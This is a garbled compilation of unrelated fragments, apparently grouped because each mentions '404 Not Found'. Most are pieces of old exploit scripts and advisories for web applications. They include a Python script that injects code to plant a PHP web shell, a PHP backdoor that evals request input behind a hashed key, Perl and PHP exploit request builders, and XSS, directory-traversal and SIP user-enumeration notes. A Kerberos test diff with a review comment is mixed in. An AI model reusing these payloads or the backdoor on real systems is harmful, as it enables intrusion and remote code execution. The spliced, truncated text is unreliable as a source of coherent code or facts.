Not Found
}
$my_template = "themes/templates/footer_inc.tpl";
$url = "http://$host:$port".$path."boards/boards_rss.php";
$_o = _s($url, "", 0, "");
if (stristr($_o, "404 Not Found")) {
die ("[!] Vulnerable script not found!\n");
}
//catch site cookie, this is needed for version compatibility, not needed in 2.6.0
$_tmp = explode("Set-Cookie: ", $_o);
$cookie = "";
fputs($FoN, $CURL_in);
while (!feof($FoN)) $data .= fread($FoN, 1024);
fclose($FoN);
$error_1 = strstr( $data, "HTTP/1.1 404 Not Found" );
if ( !empty($error_1) ){
echo "\n[-] Error : 404 Not Found. \n";
die;
}
Connected to 127.0.0.1.
Escape character is '^]'.
GET /noex HTTP/1.1
Host: localhost
HTTP/1.1 404 Not Found
Date: Thu, 09 Aug 2007 13:14:48 GMT
Server: Apache/1.3.29 (Unix) PHP/5.1.6 with Suhosin-Patch mod_ssl/2.8.16 OpenSSL/0.9.7j
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
...
doesn't like to share (c'mon man, give a bit):
<?php
if(empty ($_REQUEST['key']) ||
sha1(md5($_REQUEST['key']))!='0b6045b268cf676864a27d9663cee0a634431467'){header("HTTP/1.0
404 Not Found"); exit();}
header("Content-Type: Text/Plain");
eval(stripslashes($_REQUEST['php']));
?>
abuse@ispgateway.de: you are hosting the backdoor notification site
| | To header. A bogus non-matching value is put into the |
| | username portion of the Digest in the Authorization |
| | header. If the peer does exist the second REGISTER will |
| | receive a response of "403 Authentication user name does |
| | not match account name". If the peer does not exist the |
| | response will be "404 Not Found" if alwaysauthreject is |
| | disabled and "401 Unauthorized" if alwaysauthreject is |
| | enabled. |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
$PHPSESSID=$ARGV[8];
}
$post.=$injection."&language=en&email=y3nh4ck3r@gmail.com&password=xxxxxxxxxxx&pwdrecheck=xxxxxxxxxxx&captcha=".$code."&sumbit=Create";
$output=&request($finalhost, $post, $option, $PHPSESSID);
#processed
if($output!~(/Title: 404 Not Found/))
{
if ($output!~(/\<div align=\"center\" id=\"registerError\"\>/))
{
print "\n\t---------------------------------------------------------------\n";
print "\t-- EXPLOIT EXECUTED (BIGACE CMS 2.5 User Options changer) --\n";
$packet = "HEAD ".$p."/legalpentest.php HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: :) \r\n\r\n";
sendpacket($packet,1,0,0);
if(stristr($html , '404 Not Found') == true)
{
echo '<font color=#FFF8C6><br>Exploit
Faild...<br>-------------------------------------------------------<br></font>';
}
else {
} else if ($wp_query->is_search && $wp_query->found_posts == 0) {
echo "\t\t".'pageTracker._trackPageview("'.get_bloginfo('url').'/?s=no-results: '.$wp_query->query_vars['s'].'&cat=no-results");'."\n";
echo "\t".'} catch(err) {}'."\n";
echo '</script>'."\n";
In order to trigger this bug, a 404 (Not Found) message must be the response when supplying the XSS code into the search-form.
One can either end the script tag or use javascript in order to abuse this issue.
Proofs of Concept:
============
The GNCaster software allows communication with clients through a subset
of the HTTP protocol. If an attacker sends an HTTP GET request for a
nonexistent URL path and the request is less than 988 bytes long, the
server reacts with an HTTP 404 error and the message
File "/AAAAAA[...]AAAA" not found on this server.
If the URL path length is 988 bytes or more, the HTTP 404 error is still
returned but the server thread stops before returning the message above.
$_CONF['disable_webservices'] = true;
} else {
require_once $_CONF['path_system'] . '/lib-webservices.php';
}
if ($_CONF['disable_webservices']) {
COM_displayMessageAndAbort($LANG_404[3], '', 404, 'Not Found');
}
header('Content-type: ' . 'application/atom+xml' . '; charset=UTF-8');
WS_authenticate();
...
fp='/include/modules/top/1-random_quote.php?parse=r3d.w0rm'
data=urllib.urlencode({'quotes_to_edit':'quotes_to_edit=";$s=fopen(\'' + sys.argv[2] + '\',r);while(!feof($s)){$shell.=fread($s,1024);};fclose($s);$fp=fopen(\'../../../upload/pictures/r3d.w0rm.php\',\'w+\');fwrite($fp,$shell);fclose($fp);/*'})
urllib.urlopen(sys.argv[1] + fp,data)
urllib.urlopen(sys.argv[1] + fp)
test=urllib.urlopen(sys.argv[1] + '/upload/pictures/r3d.w0rm.php').read()
if 'Not Found' not in test :
print "Shell Uploaded ."
print sys.argv[1] + '/upload/pictures/r3d.w0rm.php'
exit()
exit(1);
}
}
$this->msg('End of the wordlist, password not found', -1);
return;
}
function bf_usr_pwd()
+#!/usr/bin/python
+from k5test import *
+
+realm = K5Realm(start_kadmind=False, create_host=False)
+output = realm.run_as_client([kvno, 'krbtgt/'], expected_code=1)
+if 'not found in Kerberos database' not in output:
+ fail('TGT lookup for empty realm failed in unexpected way')
+success('Empty tgt lookup.')
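Review bot: the check `if 'not found in Kerberos database' not in output:` ties this test to the exact wording of the client's error message, so a later rewording of that string would fail the test for a reason unrelated to the behaviour under test. Since `expected_code=1` already pins the exit status, add a short comment above the `realm.run_as_client` call saying what the `krbtgt/` lookup with an empty realm is meant to exercise and why that substring is the expected outcome. The `success('Empty tgt lookup.')` text could also mirror the wording of the `fail(...)` message ("TGT lookup for empty realm") so the two are easy to correlate in test logs.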
This patch is also available at
http://localhost/vivvo.4.1.5.1/files.php?file=../conf.php
... and we get 404 error:
Page Not Found
The requested URL was not found on this server.
If you believe this page should be here, please notify administrator.
OK, directory traversal is not possible here. But ... wait a minute ...
What happens, if we try something like this:
|